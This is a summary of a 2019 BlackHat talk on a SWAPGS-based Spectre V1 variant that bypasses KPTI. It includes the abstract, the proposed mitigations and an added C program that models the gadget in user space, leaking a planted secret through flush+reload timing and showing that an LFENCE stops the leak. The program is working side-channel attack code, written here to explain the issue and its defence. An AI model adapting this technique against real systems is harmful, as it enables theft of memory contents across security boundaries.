Bypassing KPTI Using the Speculative Behavior of the SWAPGS Instruction

Conference: BlackHat EU 2019

The presentation discusses the Spectre family of vulnerabilities and a new variant that exploits the speculative execution of the SWAPGS instruction inside the OS kernel. The speaker explains the research process and potential mitigations.
  • The starting point for the research was the earlier work of Google, Daniel Gruss and the VUSec group at Vrije Universiteit Amsterdam on speculative execution, revisited by asking whether SWAPGS itself can execute speculatively
  • The new variant is a form of Spectre V1: a value loaded through the wrong GS base during speculation is treated as an address, and the cache footprint of that access leaks kernel memory even though KPTI/KVA shadowing keeps kernel pages unmapped from user mode
  • SWAPGS is an x86-64 instruction, so the vulnerability is x86-specific; the speaker does not claim that ARM processors are affected
  • Mitigations include serializing the branches around SWAPGS (a fence such as LFENCE, so speculation cannot run past the point where the right GS base is known), clobbering the user-mode GS base so a speculative load through it cannot reach kernel data, and instrumenting the kernel's entry paths
  • The performance vs. security tradeoff is the main difficulty in fixing the vulnerability, since the affected code runs on every kernel entry
The speaker explains that the research was not a moment of eureka but a continuous process of building the attack from scratch. The team started by looking at things they believed nobody had examined before, and eventually found the vulnerability by observing that SWAPGS can be executed speculatively.


Speculative-execution-based attacks and side channels are becoming more and more common as each disclosure draws further scrutiny from researchers in this field. In this talk, we demonstrate a new type of side-channel attack based on speculative execution of the SWAPGS instruction inside the OS kernel. This attack is capable of circumventing all existing protective measures, such as CPU microcode patches or kernel address space isolation (KVA shadowing/KPTI). We practically demonstrate this by showing how the speculative execution of the SWAPGS instruction may allow an attacker to leak portions of the kernel memory, by employing a variant of Spectre V1. During the talk, we will also detail some other minor discoveries related to speculative execution, mainly how some segment registers are handled.
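The abstract above describes the gadget shape (a branch that decides which base a load uses, the loaded value then used as an address) and the summary lists "serializing branches" as a mitigation. The following is an added user-space model of that shape, written for this page; it is not Bitdefender's proof of concept and not kernel code. A bounds check on a small "per-CPU" area stands in for the branch that decides whether SWAPGS has put the correct base in GS, the secret is placed in memory the gadget never reads architecturally, and the leak is recovered with flush+reload. The `HIT_THRESHOLD`, `TRIES` and training pattern are assumptions to tune per machine; the code requires an x86-64 GCC/Clang toolchain, and the leak itself is probabilistic, so a run may show partial garbage even without the fence.

```c
/* Added example: user-space model of a "value used as an address" Spectre V1
 * gadget and its LFENCE mitigation. Not the talk's PoC, not kernel code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <x86intrin.h>

#define GS_AREA_LEN   16u
#define STRIDE        4096u
#define HIT_THRESHOLD 80u   /* cycles; cache-hit cutoff, tune per machine (assumption) */
#define TRIES         100

/* Constructed "kernel memory": a small per-CPU area the entry path is allowed
 * to read, immediately followed by data it must never hand to user mode. */
static struct {
    uint8_t gs_area[GS_AREA_LEN];
    char    secret[32];
} kernel = { {0}, "KPTI does not help here" };

static uint8_t probe[256 * STRIDE];                 /* one probe line per byte value */
static volatile uint8_t sink;                       /* keeps the loads alive */
static volatile unsigned gs_area_len = GS_AREA_LEN; /* volatile: force a real branch */

/* Victim gadget. The bounds check plays the role of the branch that decides
 * whether the right base is in GS; the byte loaded "through GS" is then used
 * as an address. Architecturally an out-of-range index reads nothing and
 * returns -1; speculatively the load and the probe access still happen. */
static int entry_path(size_t idx, int mitigated) {
    if (idx < gs_area_len) {
        if (mitigated) _mm_lfence();         /* serialize: nothing below runs speculatively */
        uint8_t v = kernel.gs_area[idx];     /* "GS-relative" load */
        sink = probe[v * STRIDE];            /* loaded value treated as an address */
        return v;
    }
    return -1;
}

/* Index at which gs_area + idx aliases secret[k] (layout is fixed by the struct). */
static size_t secret_index(size_t k) {
    return (size_t)((const uint8_t *)kernel.secret - kernel.gs_area) + k;
}

/* Time one load of *p with rdtscp; a cached line is far cheaper than a flushed one. */
static unsigned reload_cycles(const uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *p;
    uint64_t t1 = __rdtscp(&aux);
    return (unsigned)(t1 - t0);
}

static void flush_probe(void) {
    for (unsigned v = 0; v < 256; v++) _mm_clflush(&probe[v * STRIDE]);
}

/* Recover one byte: train the branch in-bounds, flush the probe lines, make the
 * bound slow to fetch so the branch resolves late, run the out-of-bounds call,
 * then see which probe line came back cached. Returns -1 if nothing was seen. */
static int leak_byte(size_t target_idx, int mitigated) {
    unsigned score[256] = {0};
    for (int t = 0; t < TRIES; t++) {
        for (int i = 0; i < 5; i++) entry_path((size_t)i, mitigated); /* train "taken" */
        flush_probe();
        _mm_clflush((const void *)&gs_area_len);  /* bound leaves the cache: late resolution */
        _mm_mfence();
        entry_path(target_idx, mitigated);        /* the mispredicted call */
        for (unsigned v = 0; v < 256; v++) {
            unsigned mix = (v * 167 + 13) & 255;  /* scrambled order defeats the prefetcher */
            if (reload_cycles(&probe[mix * STRIDE]) < HIT_THRESHOLD) score[mix]++;
        }
    }
    int best = 0;
    for (int v = 1; v < 256; v++) if (score[v] > score[best]) best = v;
    return score[best] ? best : -1;
}

int main(void) {
    for (int mitigated = 0; mitigated < 2; mitigated++) {
        printf("%s: ", mitigated ? "with lfence" : "no lfence  ");
        for (size_t k = 0; k < strlen(kernel.secret); k++) {
            int b = leak_byte(secret_index(k), mitigated);
            putchar((b >= 0x20 && b < 0x7f) ? b : '?');
        }
        putchar('\n');
    }
    return 0;
}
```

Build with `gcc -O1 swapgs_model.c -o swapgs_model` (the file name is an assumption) and run on bare metal or a VM that exposes `rdtscp`. The unmitigated pass should print most of the secret; the fenced pass should print only `?`, because the LFENCE makes the load wait for the bound to arrive and the branch to resolve, which is exactly the cost the summary's performance-vs-security bullet refers to when it is paid on every kernel entry.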